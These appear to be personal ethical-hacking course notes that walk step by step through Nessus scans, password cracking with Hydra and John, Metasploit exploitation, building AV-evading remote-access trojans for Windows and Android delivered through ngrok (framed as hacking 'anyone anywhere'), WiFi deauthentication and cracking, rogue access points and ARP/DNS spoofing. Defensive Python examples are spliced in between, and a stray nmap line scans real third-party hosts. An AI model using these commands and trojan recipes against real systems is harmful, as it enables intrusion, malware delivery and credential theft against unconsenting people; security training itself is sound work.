Tools for vulnerability assessment

vulnerability assessment can be done on networks and web servers

for network security, we can use

- wireshark

- nmap

- metasploit

for web security,

- Nikto

- OWASP

vulnerability assessment can be done in 2 ways: manually or automated.

for automated:

- Nessus: one of the best tools. Here we'll learn how to install Nessus on Windows and Kali.

for Windows:

- start up your browser and search for nessus essentials download (make sure you get it from their official site, which is Tenable).

Nessus has a free version and a paid version

- register for an activation code on the default page

- it will take you to the download page; click on it and install it on your Windows

- after installation, it will take you to your browser, where you'll click on connect via SSL

- click on continue and make sure you tick register for Nessus Essentials

- skip to the next step since you already have an activation code

- input your activation code and click on continue

- create a username and password you cannot forget, because there is no way to reset the password if forgotten

- after that, click on the next button and wait for it to download the plugins

- in case it fails, open your command prompt as administrator

- after it has opened, type in the command cd c://

- cd Tenable

- cd Nessus

- nessuscli.exe update

https://localhost:8834 127.0.0.1

nmap -Pn -p- -sI kiosk.adobe.com www.riaa.com

Monday, 21st August, 2023

Open nessus, to open nessus manually,

- go to your c drive and look for program files

- click on it, then go to tenable

- you'll see nessus, click on it

- then open the 3 files, nessusd, nessus-service, and open ssl

- go to your command prompt and check for your ip address, copy it

- then go to your browser and search https://[youripaddress]:8834

- this will start up your nessus manually

to carry out scan with nessus

- click on policies; this is like template

- click on 'create a new policy', there are many types of scans nessus
can carry out but we'll go with 'Advanced Scan'

- click on it and give it a name and type in your description

- after that, go to 'Discovery', check UDP and check on fragile devices
too

- next, go to 'Port Scanning', type in your port range but we'll use
default. the default is from 1-1024

- check verify and UDP then we go to Identity.

Note; if you're scanning a Windows OS, you'll check on 'Collect Data'
under General settings in Identity.

- under assessment, check on perform thorough tests

- next is the brute force, if the server is using Oracle Database, you
should check on Test on default accounts

- next is web applications, turn ON 'scan web applications' and check on
'follow dynamically generated pages' and check on 'Enable generic web
application tests', 'Try all HTTP methods', check on 'HTTP parameter
pollution', check on 'Test embedded servers', check on 'test more than
one parameter at a time per form' and check on 'test all combinations of
parameters (slowest)'

- check on do not stop after first flaw and check on 'look for all flaws'
also

- since we're scanning a linux machine, we'll leave windows and go to
malware, turn ON 'scan for malware' under malware settings and check on
'linux directories'

- click on advanced, and check on 'Automatically accept detected SSH
disclaimer prompts', check on 'slow down the scan when network
congestion is detected', check on 'log scan details'.

basically, we have 2 types of scan, credential and non credential

The scan we are carrying out is non credential

- next, go to plugins, enable all plugins then finally 'SAVE'

How to initiate a scan


- click on my scan

- click on new scan, you'll see user defined at the top - click on it and
you'll see the policy you created.

the only thing we need to use for this scan is the ip address.

- go to kali and check for metasploitable2 ip address

- click on scheduled and make sure it's not enabled since we are
scanning now

- save it and you'll see it on the page

- click on launch to begin the scan and you can also click on it to check
the progress

How to generate a report

you'll see report at the top, click on it and click on detailed vulnerabilities
by host and click on generate. then save the file

Wednesday, 23rd August, 2023

Credential Scan

To carry out a credential scan, create a new policy (it's the same as the
step above) but when you reach Credentials, you'll select SSH and under
authentication method, you'll choose password, then create a username
and password then continue the step. Save when done and you can carry
out your scan.

credential scans usually take more time because nessus will be able to
log in to the system to carry out the scan. a credential scan will also give
you more results than the non credential

How to analyze result


the summary is the first one where it'll give you the scan information
like the chart, start and stop time, and the host information.

the next one is the vulnerabilities, it starts from the highest to the lowest
and it will tell you the name of the vulnerability and the synopsis will tell
you what the vulnerability is about. the description will tell you what an
attacker can do with the vulnerability. the next part is the solution where
it'll tell you what you can do to fix the vulnerability. the risk factor wi.

The CVSS Score tells you the impact of that vulnerability. The highest is
10. It means the damage will be high if an attacker is able to exploit the
vulnerability. The CVSS has 2 versions which are CVSSv3.0

To break down the CVSS score

- start up your browser and search for CVSS 3.0 calculator
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator

- Attack Vector can either be set to Network, Adjacent Network, Local
or Physical. eg. 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

so since AV is set to N it means network. the AC means Attack
Complexity which can be set to high or low. the PR means Privileges
Required which is set to None here (it can be set to none, low or high). the
UI means User Interaction. the next is Scope, it can either be unchanged
or changed. The C means Confidentiality impact, if it is set to none - it
means the attacker cannot see confidential information, if it is low, it
means partially and so on. the I means Integrity which means whether the
content of some files can be changed if the attacker exploits the
vulnerability. if it's set to high, it means the attacker can completely
alter a file. the A means Availability Impact which means whether the
system will be available to users or not if the attacker is able to exploit
the vulnerability.

you can hover over it and it will give you more information about it.

PASSWORD HACKING

characteristics of a strong password

- the length shouldn't be less than 8 characters


- use a mix of uppercase, lowercase, numbers and special characters

- do not use your first, middle or last name as password

types of attacks on password

- online: this is divided into passive and active

passive: this type of attack is carried out on difficult passwords. the
following are types of passive attacks:

- Wire sniffing: this is also known as wireshark

- man in the middle attack: this is when an attacker is in the
middle of a session.

- replay attacks: this is like watching a video replay. an example is
session hijacking. it is similar to man in the middle attack

active:

- password guessing: an example is default logins

- bruteforce attack: this uses a character set to create permutations.

- dictionary attack: this is when you have a list of words saved in a
file and you put this into a cracking tool and the cracking tool loops
through it until it gets to the right password if it's in the file. it usually
uses a word list

- offline: an example is a rainbow table attack

C://windows/system32/config/SAM - this is where windows password
is saved

/etc/shadow - this is linux

rainbow table attack: this is like multiplication table. it has the
plaintext value for every hash (hashes are cryptographic values). it takes
a longer time to crack the same passwords and depends on the
complexity of the passwords. there are thousands of hash algorithms.

Kali Hash uses SHA256 hash algorithm


windows uses LM hash algorithm

non-electronic:

- shoulder surfing: this is when an attacker is looking over your
shoulder when you're

- keyboard sniffing

disadvantages of password attacks:

- account lockout can take place

- time consuming

- consume large amount of network bandwidth

Hashing is one way i.e if you want to make a doughnut, you'll have to
combine all the ingredients together to make the doughnut. now imagine
if you can extract the ingredients after you make the doughnut.

Encryption is 2 ways, like sending an item to someone: you buy a box,
put those items in the box and lock it then send it. whoever you're
sending that item to needs to have the key to open the box to get the
item.

tools for password attacks:

- hydra: this is used for online attacks.

- john the ripper: this is used for offline attacks

- crunch: this is a wordlist generator

- aircrack: this is used for wireless attacks

how to use John the Ripper:

- copy the password hash keys and paste it in a text editor and save it.

there is a tool called hash identifier to help you identify the type of hash
algorithm used to create a password hash

- go to your kali and go to password attacks

- under password attacks, click on offline attacks - there you'll see
hash identifier

- open your browser and search md5 encrypt

md5 is a hash you can use to encrypt your password into hash

- click on MD5 Hash Generator and type in a string and click on
generate

- copy the hash it generated and paste it on the hash identifier - it will
tell you the hash is MD5 hash in the possible hashes.

Kali hash is secured so if you copy a Kali hash and paste it in the hash
identifier, it will give you an error.
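From the defender's side, the same identification step is useful for auditing how passwords are stored. The following added example (not part of the original notes) classifies stored hashes by their format, flags weak or unsalted storage, and shows that identical unsalted digests reveal shared passwords. All sample records are constructed, and the strength ratings are this example's own judgement.

```python
import hashlib
import re
from collections import defaultdict

# (prefix, scheme, rating). Ratings are this example's own judgement call.
CRYPT_SCHEMES = [
    ("$y$", "yescrypt", "strong"),
    ("$2a$", "bcrypt", "strong"),
    ("$2b$", "bcrypt", "strong"),
    ("$2y$", "bcrypt", "strong"),
    ("$6$", "sha512crypt", "acceptable"),
    ("$5$", "sha256crypt", "acceptable"),
    ("$1$", "md5crypt", "weak"),
]
# Bare hex digests carry no salt; the length only narrows the candidates.
RAW_DIGESTS = {
    32: "raw 128-bit digest (MD5, NTLM, ...)",
    40: "raw 160-bit digest (SHA-1, ...)",
    64: "raw 256-bit digest (SHA-256, ...)",
    128: "raw 512-bit digest (SHA-512, ...)",
}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def classify(field):
    """Return (scheme, rating) for one stored password field."""
    if field == "":
        return ("empty password", "critical")
    if field[0] in "!*":
        return ("locked or no login", "n/a")
    for prefix, scheme, rating in CRYPT_SCHEMES:
        if field.startswith(prefix):
            return (scheme, rating)
    if HEX_RE.match(field) and len(field) in RAW_DIGESTS:
        return (RAW_DIGESTS[len(field)], "weak")
    return ("unknown format", "review")


def audit(lines):
    """Audit 'user:hash[:...]' records; return (findings, shared_hashes)."""
    findings, by_hash = [], defaultdict(list)
    for line in lines:
        line = line.strip()
        user, sep, rest = line.partition(":")
        if not sep or line.startswith("#"):
            continue  # blank, comment or malformed record
        field = rest.split(":")[0]
        scheme, rating = classify(field)
        if rating in ("weak", "critical", "review"):
            findings.append((user, scheme, rating))
        if rating not in ("n/a", "critical"):
            by_hash[field].append(user)
    # Identical stored values mean identical passwords (no per-user salt).
    shared = {h: users for h, users in by_hash.items() if len(users) > 1}
    return findings, shared


def _md5(text):
    return hashlib.md5(text.encode()).hexdigest()


# Constructed sample records: shadow-style lines and web-app style rows.
SAMPLE = [
    "root:$y$j9T$constructedsalt$" + "A" * 43 + ":19590:0:99999:7:::",
    "backup:$6$constructedsalt$" + "B" * 86 + ":19590:0:99999:7:::",
    "legacy:$1$constsal$" + "C" * 22 + ":19590:0:99999:7:::",
    "daemon:*:19590:0:99999:7:::",
    "webuser1:" + _md5("constructed-sample-1"),
    "webuser2:" + _md5("constructed-sample-1"),
    "webuser3:" + _md5("constructed-sample-2"),
]

if __name__ == "__main__":
    findings, shared = audit(SAMPLE)
    for user, scheme, rating in findings:
        print("%-9s %-8s %s" % (user, rating, scheme))
    for users in shared.values():
        print("same stored hash, same password:", ", ".join(users))
```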

how to crack a password hash

- open your terminal and type in the command

sudo john --format=crypt [/path to the saved password
hash/filename] - for kali hash algorithm

sudo john --format=RAW-md5 [/filepath] - for md5 hash algorithm

John has a lot of formats you can use to crack password hashes. you can
check it by sudo john --list=formats. We choose crypt because of the
hash algorithm we want to crack.

mimikatz, pwdump - these are tools on windows

SERVER HACKING

- Start up metasploitable2 and carry out a port scan on it.

we're attacking port 21(ftp), 22(ssh), 3306(MySql) - we are focusing on
these ports because, before you can use these ports, they are going to ask
for username and password, so we are going to carry out _____ attack on
ports.

we'll see how to attack ports using two methods;

1. Bruteforce method - we'll be using the tool called hydra (hydra is an
online password cracker, you can use it to attack any service online).

Now we want to attack port 21,

- Open terminal and type in the command sudo hydra -L
[/wordlist.file path] -P [/wordlist.filepath] ftp://[target.ip]

-L is used to specify the path to our wordlist which is for
username

-P is used to specify path to our wordlist which is for password

you can find a wordlist on kali /usr/share/wordlists/ or you can
create a wordlist yourself

ftp client - this is a software you can use to connect to ftp server so
we'll be using the tool filezilla. to install filezilla,

- type in the command sudo apt install filezilla

- after installation, go to the dragon icon on kali and search filezilla
and open it

- it'll ask for host, username, password and port

for the host, you'll input your target ip address

for username, input the username you got from hydra

for password, input the password you got from hydra

and input the port number for the port

- after inputting the details, then click on quickconnect

- after you're logged in, steal a file from the

Now we want to attack port 22,

it's still the same step and the command will be sudo hydra -L
[/wordlist.file path] -P [/wordlist.filepath] -t 4 ssh://[target.ip]

any time you attack an ssh server, to connect to it, you'll use the
command ssh [username]@[target.ip] on the terminal and it will ask
for password.

after breaking into the server, steal the password hash and crack it.
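On the server side, an online brute-force run like the ones above shows up as a burst of failed logins from one address, often across many usernames. The following added example (not part of the original notes) detects such bursts in OpenSSH auth-log lines and reports whether a successful login followed. The log lines are constructed, and the threshold, window and year are assumed defaults.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches OpenSSH password-auth lines as written to auth.log / syslog.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")


def parse(lines, year):
    """Return sorted (time, result, user, ip) tuples; syslog omits the year."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        when = datetime.strptime("%d %s" % (year, m["ts"]),
                                 "%Y %b %d %H:%M:%S")
        events.append((when, m["result"], m["user"], m["ip"]))
    return sorted(events)


def detect_bruteforce(lines, year=2023, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failures inside a sliding window."""
    failures, successes = defaultdict(list), defaultdict(list)
    for when, result, user, ip in parse(lines, year):
        bucket = failures if result == "Failed" else successes
        bucket[ip].append((when, user))
    window = timedelta(seconds=window_seconds)
    alerts = []
    for ip, fails in failures.items():
        start, best = 0, (0, 0, 0)  # (count, start index, end index)
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if end - start + 1 > best[0]:
                best = (end - start + 1, start, end)
        if best[0] < threshold:
            continue
        burst = fails[best[1]:best[2] + 1]
        # A success after the burst began suggests a guessed credential.
        login = next((u for t, u in successes[ip] if t >= burst[0][0]), None)
        alerts.append({"ip": ip, "failures": best[0],
                       "users_tried": sorted({u for _, u in burst}),
                       "first_seen": burst[0][0],
                       "success_after": login})
    return alerts


# Constructed sample: a burst from 192.0.2.50, then one ordinary typo.
_USERS = ["root", "admin", "test", "user", "ftp", "postgres", "service",
          "msfadmin"]
SAMPLE_LOG = [
    "Aug 21 10:15:%02d msf2 sshd[4242]: Failed password for %s%s "
    "from 192.0.2.50 port %d ssh2"
    % (i * 4, "" if u in ("root", "msfadmin") else "invalid user ", u,
       40000 + i)
    for i, u in enumerate(_USERS)
] + [
    "Aug 21 10:15:40 msf2 sshd[4242]: Accepted password for msfadmin "
    "from 192.0.2.50 port 40100 ssh2",
    "Aug 21 10:20:03 msf2 sshd[4300]: Failed password for alice "
    "from 198.51.100.7 port 51000 ssh2",
    "Aug 21 10:20:15 msf2 sshd[4300]: Accepted password for alice "
    "from 198.51.100.7 port 51002 ssh2",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```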

vulnhub for machines to use for hacking

Wednesday, August 2023

Today, we are attacking port 3306(MySql)

- Start up your metasploitable2 and get the ip address

- sudo hydra -L [path-to-wordlist] -P [path-to-wordlist] -t 4
mysql://ipaddress

you will get an error on this, so go to your wordlist and make a space
on the first line and add root to your wordlist username and password.

after that run the command again.

- we'll be needing a client application to connect to the database so
we'll be using the tool dbeaver

- type in sudo apt install dbeaver to install dbeaver

- once installed, search for it on the application menu and open it

- after loading, click on MariaDB

- select host and add the IP address of the target (metasploitable2) on
the server host

- the username is there automatically which is root and we do not
need to input password since the database does not require password

- click on Test Connection to test it and it will download some drivers

- if it brings out connected then the details are correct, if not, go back
and crosscheck

- after that, click on finish

- you'll see a drop down beside the ip address, click on it and double
click on the database and it will bring out the database

in this example, we'll go with the dvwa database

- double click on dvwa database and it will show you the tables
under it

- select the users table (the attacker will be interested in the users
table since that is where usernames are stored)

- click on table data and it will show you the usernames and password
hash

- paste the target (metasploitable2) ip on the browser and click on the
dvwa and it will bring you to the login page

To get the password instead of cracking it;

determine what type of hash the password is and generate a new one
yourself, then copy the hash of the password you generated and replace
it with the password hash of the target then save it. Now go back and
login with your own password and voila - it logs in

2. Known Exploit

What Can You Do If The Password is Complicated and you still
cannot get the password?

- carry out a version detection scan on the target - this will show you
the product number and product version

we are going to use this to check if there is exploit for those product
version and the version number

we are going to use the tool metasploit framework

to start up metasploit framework

- type in msfconsole on the terminal

- use search command to search for exploit on the product name and
the version number as in search "vsftpd 2.3.4"

- you'll use this to select the exploit by use 0 (Note: 0 is the number
of the exploit)

- Now type in show options to show information about the exploit

you'll see some options set to No or Yes under required, the ones set to
No are not necessary

RHOSTS - means the ip address of the target (metasploitable2)

RPORT - means the port number of the target

LHOST - means the ip address of your machine (Kali)

LPORT - means the port number of your machine

- Now, you'll set RHOSTS using the command set RHOSTS
[target.ip]

- set the RPORT to 21 also; set RPORT 21

- type in show options again to see the changes you made

- type in exploit and it will log you in

for every exploit, you have to go in with a payload set payloads

if you're getting a payload error, this is the step you'll follow;

- msfconsole

- search "product version"

- use {select exploit number}

- show payloads

- set payload {payload number}

- show options

- set RHOST {target ip}

- set LHOST {kali ip}


- set LPORT 4444

- exploit

- sudo ufw allow 4444

Monday, 4th September, System Hacking

How to hack WindowsOS

Steps to creating a virus for windowsOS

We are going to use ngrok. Ngrok is used for port forwarding. You can use it
to hack anyone anywhere.

- Start up your browser search for ngrok and create an account with
them and verify your email and then go on to download

- After downloading, unzip the file and follow the instructions of the
installation on the website. Note that under connect account, you will
add ./ at the beginning of the command and run it with sudo right and
without sudo right.

Some files will be given to you (NXcrypt and crypt_deliver). Copy
crypt_deliver to windows OS and NXCrypt to Linux OS.

NXcrypt is used for encrypting virus on Linux OS. It bypasses windows
defender and firewalls on the system. If it's encrypted, windows will not
be able to read the file and determine if it's a virus or not.

To start up ngrok;

- type in the command sudo ./ngrok tcp [kali.ip]:4444

Note: you can use any port number that is available on the system but
4444 is fine

you'll see an interface that'll bring something like
tcp://6.tcp.eu.ngrok.io:19449 -> [ip.address]:[port.number]

Note: 6.tcp.eu.ngrok.io above is LHOST of ngrok and 19449 is
LPORT of ngrok

- open a new terminal to create a virus

- type in the command;
msfvenom -p python/meterpreter/reverse_tcp
LHOST=[ngrok.ip] LPORT=[ngrok.port.no] -o
[/path.to.save/virus_name.py]

Note: the command above is used to create a remote access
trojan and the file you are creating must have python extension (i.e it
will have .py at the end)

Now, we are going to encrypt the virus

- open a new terminal and cd into the NXcrypt folder

- and run the command; sudo
./NXcrypt.py -f [virusname.py] -o [encrypted_virus_name.py] and
your virus is encrypted.

Note: this might give you permission error, if so - give the
virusname.py the permission to execute

For the virus you created to work, the system you intend to hack
must have a python interpreter installed on the system. So we are going
to couple it in a way that python will be automatically installed on the
system if python is not on it when the link is clicked.

To couple the virus

- go to your windows and extract crypt_deliver then copy the
encrypted trojan file into the folder

- then start up your command prompt as administrator and cd into the
crypt_deliver folder

- after you are in the folder, type in the command packer.bat
[encrypted_virus_name.py] python.msi

the command above will convert the virus into digital certificate

- you'll notice that in the crypt_deliver folder, you'll find a file named
payload_delivery, right click on it and click on edit

- after it opens on notepad, you'll find a command "hello.py" on the
page at the beginning and replace it with the encrypted virus you created
[encrypted_virus_name.py] and save it

- after saving it, close it and rename the file with something else
maybe (data_bot)

Now, we are going to see where we'll be controlling the victims machine
after they have clicked on the virus, that is where we will start up listener

to start up listener

- open up a new terminal on kali and start up msfconsole

- after msfconsole is up, type in the command use
exploit/multi/handler

- after that, type in the command; set
payload python/meterpreter/reverse_tcp

Note: this is the interpreter we used in creating our virus

- type in the command set LHOST [your.kali.ip]

- and also set LPORT [port.number]

- then type the command exploit after that

the next step is to allow ufw (firewall of the kernel), to do that
we use the command below to install ufw

- open up a new terminal and type in the command sudo apt install
ufw

- after installation, type in the command sudo ufw allow
[port.number]

How to hack AndroidOS

- Go to your kali browser and search EvilDroidNew github

- Click on the one for github and follow the instructions to install it and
after installation, run it

- Select 4 (Bypass AV APK) on the options and input your ip address

- Input your IP address (kali ip or Ngrok)

- Input your port number (eg 4444)

- Input your payload name

- Next, choose android/meterpreter/reverse_tcp as your payload
option

- Next, choose the first option (APK-MSF)

- The next option, will be icon. Then go to your browser and search for
a png image related to your payload name and save it in the
EvilDroidNew folder under icon

- Now, go to your terminal and select the png image and wait for it to
build

- After it builds, fill the stuffs that follows

you might get an error ([!] Failed to verify signed artifacts), if you do
get the error, run the following command

- open a new terminal

- sudo apt update

- sudo apt install openjdk-11-jdk-headless

- sudo apt install lib32z1

After you're done with the above process, now run EvilDroidNew again

you might get an error ([!] Failed to align recompiled APK) again, to
fix this error, you'll go through the following process;

- start up your kali browser and search for "SDK build tool
download"

- go with the "download build tools for Android SDK
manager"

- download the older version for linux

- after downloading, extract the file and copy it into
EvilDroidNew folder

- open it and go to the last file in the folder "zipalign"

- drag the file "zipalign" into the terminal

- now go back and open the evildroid file with mousepad

- scroll down and find "zipalign 4 evil.apk $apk_name.apk
2>&1" (it should be on line 618 or 620) and remove the zipalign in
front of it

- now, go and copy the filepath and paste it at the front
and add ./ to the zipalign as in
"/home/kali/Downloads/Evil-Droid-NEW/android-4.4.2/./zipalign 4 evil.apk $apk_name.apk 2>&1"

Now, go back and run EvilDroidNew, it'll bring done and some options
and continue the following process

- select OK and select Multihandler (this will start up metasploit
framework for you)

The virus is built like this

- Now go to EvilDroid folder then go to evilapk - you'll see the virus
there and then you can send it to your android device

Note: the android device and your kali must be on the same
network and on bridge for you to be able to gain access.

For NAT user, you can use Ngrok ip address and port number to
access it.

Note: if you don't have android device, you can download NoxPlayer on
windows and install it.

to copy the apk into noxplayer, go through the following steps;

- go to kali and cd into the evilapk folder

- sudo chmod 777 [apk.name]


- sudo python3 -m http.server 8000

another terminal

- sudo ufw allow 8000

Project - doubletrouble

WIFI HACKING

- Put wireless card in monitor mode

- start up your terminal as root and type in the command airmon-ng
start wlan0 - this will start up monitor mode

the next step now is to monitor wifi around, to do that. follow the process
below;

- start up a new terminal as root using sudo bash

- type in the command airodump-ng wlan0mon

you'll see the BSSID column, that is where the MAC addresses are

the CH is the Channel column and the ESSID is the wifi/hotspot name

- capture Packet and save to disk

- open a new terminal and login as root

- type in the command airodump-ng --channel [channel no] -w
[/path to save] --bssid [mac address] wlan0mon and this will bring
out another interface.

get the MAC address on the station and save it somewhere because it
won't allow you to copy

Now, the next step is to perform a deauthentication attack to capture the
pre-shared key

- start up your terminal and login as root

- type in the command aireplay-ng --deauth 5 -a
[wifi.mac.address] -c [station.mac.address] wlan0mon

the next step now is to crack the pre-shared key using crunch. and
crunch has a character set in the path /usr/share/crunch/charset.lst

- crunch [min.len] [max.len] -f [/path.to.character_set] -o
[/path.to.save]

we cannot save this file since the size is large, so what we are going to do
is tell crunch to use it immediately as it is generating it instead of saving
it. to do that;

- log in to terminal as root

- crunch [min.len] [max.len] -f /usr/share/crunch/charset.lst
numeric | aircrack-ng --bssid [wifi.mac.address] -w-
[/path.bssid.is.saved]

ROGUE ACCESS POINT

- Plug in your network adapter

- open a new terminal and login as root

- type in the command airmon-ng start wlan0 - this will create a
monitor mode

- open a new terminal and login as root then type in the command
airbase-ng -e [wifi.name] -c [channel.no] [mon]

at this point, you cannot access the wifi yet so we are going to
configure it now

- open a new terminal and login as root then type in the command
ifconfig at0 up

after this, open the dhcp configuration file

- open a new terminal as root and type in the command ifconfig at0
[gateway.ip] netmask [subnetmask.ip]

- open a new terminal as root and type route add -net [network.ip]
netmask [subnetmask.ip] gw [gateway.ip]

the next step now is to install the dhcp server. the dhcp server is the one
that will give the victims ip addresses. to install;

- open a new terminal and type in the command sudo apt-get install
isc-dhcp-server

after installation, the next step is to start up our dhcp server, to do that;

- open a new terminal as root and type in the command dhcpd -d -f -cf
[/path.to.dhcpd configuration file] at0

after, configuration, you will be able to connect to the network. the next
step is to give it internet connection

- open a new terminal as root and type in the command iptables -P
FORWARD ACCEPT ; this command is used to enable ip forward on the
firewall

- type in the command echo "1" > /proc/sys/net/ipv4/ip_forward -
this will enable ip forward on the host

the next step is (here you need two interfaces)

- open a new terminal as root and type iptables -t nat -A
POSTROUTING -o [network.interface] -j MASQUERADE

ROGUE ACCESS POINT WITH DIFFERENT TOOL (HOSTAPD)

- open up your terminal and update your repository

- the next step is to install hostapd, to install hostapd - type in the
command sudo apt-get install hostapd

- next you cd into /etc/hostapd and copy the hostapd.conf file into the
path

- next cd into /etc/default/ and open the file hostapd

- after opening the file, add the path to your hostapd configuration file
to the DAEMON_CONF=

after that, save it and close the file

- next step is open a new terminal and login as root and switch your
network card to monitor mode

- next step is to start up hostapd with the command systemctl
unmask hostapd (Note that you'll be running the command in root)

- next, you'll run the command systemctl enable hostapd (if you
check your wifi, you'll see the name of your wifi)

- now, the next step is to configure the wifi using the command ifconfig
[interface] [gw.ip] netmask [subnetmask.ip] - run it as root

- next the command route add -net [network.ip] netmask
[subnetmask.ip] gw [gateway.ip]

next step is to start up dhcp server;

- open a new terminal and login as root then type in the command
dhcpd -d -f -cf [/path to dhcpd config file] [interface] - this will start
up the dhcp server

- open a new terminal with root and run the command iptables -P
FORWARD ACCEPT

- next the command iptables -t nat -A POSTROUTING -o
[interface.connected to internet] -j MASQUERADE

- next echo "1" > /proc/sys/net/ipv4/ip_forward

after this command, this will give the access point (fake wifi) internet
access

Next step is to sniff on the interface

to start sniffing on the wifi, you'll follow steps below;


- open wireshark and start sniffing on the interface (wlan0mon)

sslstrip

sss7

MAN-IN-THE-MIDDLE-ATTACK & DNS SPOOFING

Man in the middle attack is when an attacker places himself in the middle
to intercept information. MITM attack is very dangerous.

The concept of MITM attack is that it carries out ARP spoofing

ARP - Address Resolution Protocol; it is used to map IP address to MAC
address. the ARP protocol has what we call an ARP table which consists of
IP address and MAC address.

ARP poisoning updates the ARP table with fake IP address and MAC
addresses.
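Because ARP poisoning rewrites the ARP table, a poisoned host can be recognised from that table. The following added example (not part of the original notes) parses `ip neigh show` output and flags a gateway whose MAC address is shared with another host or differs from a recorded baseline. The neighbour tables, gateway address 192.168.2.1 and MAC addresses are constructed.

```python
from collections import defaultdict


def parse_neigh(text):
    """Parse `ip neigh show` output into {ip: mac}. Entries without a
    link-layer address (FAILED / INCOMPLETE) are skipped."""
    table = {}
    for line in text.splitlines():
        tokens = line.split()
        if "lladdr" not in tokens:
            continue
        idx = tokens.index("lladdr")
        if idx + 1 < len(tokens):
            table[tokens[0]] = tokens[idx + 1].lower()
    return table


def find_arp_anomalies(text, gateway_ip, known_gateway_mac=None):
    """Return a list of (kind, mac, ips) findings for one ARP table."""
    table = parse_neigh(text)
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    # One MAC answering for several IPs is the footprint of ARP poisoning.
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            kind = ("gateway_mac_shared" if gateway_ip in ips
                    else "duplicate_mac")
            findings.append((kind, mac, sorted(ips)))
    # Compare the gateway entry against a baseline recorded when clean.
    seen = table.get(gateway_ip)
    if known_gateway_mac and seen and seen != known_gateway_mac.lower():
        findings.append(("gateway_mac_changed", seen, [gateway_ip]))
    return findings


# Constructed sample tables, as seen on a victim host.
GATEWAY_IP = "192.168.2.1"
GATEWAY_MAC = "52:54:00:12:35:02"
CLEAN = """\
192.168.2.1 dev eth0 lladdr 52:54:00:12:35:02 REACHABLE
192.168.2.120 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
192.168.2.105 dev eth0 lladdr 08:00:27:11:22:33 REACHABLE
192.168.2.130 dev eth0  FAILED
"""
POISONED = """\
192.168.2.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.2.120 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
192.168.2.105 dev eth0 lladdr 08:00:27:11:22:33 REACHABLE
192.168.2.130 dev eth0  FAILED
"""

if __name__ == "__main__":
    for name, table in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, find_arp_anomalies(table, GATEWAY_IP, GATEWAY_MAC))
```

A shared MAC is not always an attack (proxy ARP and multi-address hosts produce it too), so the baseline comparison for the gateway is the stronger signal.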

we'll be using ETTERCAP and ARPSPOOF tool.

- type ettercap --help to check if ettercap is installed

- to start up ettercap, open your terminal and type ettercap -G

- next is to install arpspoof using the command sudo apt install
dsniff

before we use ettercap, we'll have to do some configuration. to do that,
cd into /etc/ettercap, you'll find a file etter.conf and open it. At the
beginning of the conf file, you'll see uid and gid, change them to root
i.e 0 and save

Scroll through the file until you see LINUX and you'll see #redir line,
remove the hash before the redir line on the four of them and save it

next is to configure the dns server, you open etter.dns file again and
scroll to the last page and type in the command

[domain to spoof] [A record] [ip.address of host]
[timetolive(TTLvalue)] as in

hiitplc.com A 192.168.2.120 65535

*.hiitplc.com A 192.168.2.120 65535

www.hiitplc.com A 192.168.2.120 65535

after you've input this, SAVE.

After that, cd into /etc and open the hosts file and you'll find the IP
address for localhost and kali - Add # in the front of the ipaddress of
localhost and kali and add your ip address to the next line and domain
name you want to spoof as in; 192.168.2.120 hiitplc.com
www.hiitplc.com *.hiitplc.com

the final configuration is to cd into /etc and open the file hostname and
delete kali then put the domain name you want to spoof there. (Note: you
can only put one domain name here)

- open a new terminal and login as root

- run the command arpspoof -i [interface] -t [gateway.ip] -c both
-r [target.ip]

-c is for mac address, the options you have is own/host or you can
set it to both

after this

- open a new terminal and login as root

- run the command arpspoof -i [interface] -t [target.ip] -c both -r
[gateway.ip]

the next step is to give it internet access. to do that;

- open a new terminal and login as root

- run the command ettercap -G to start ettercap

- open a new terminal and login as root

- type in the command iptables -P FORWARD ACCEPT


- echo "1" > /proc/sys/net/ipv4/ip_forward

- sudo service apache2 start

- sudo ufw allow 53

route -n to check your network gateway
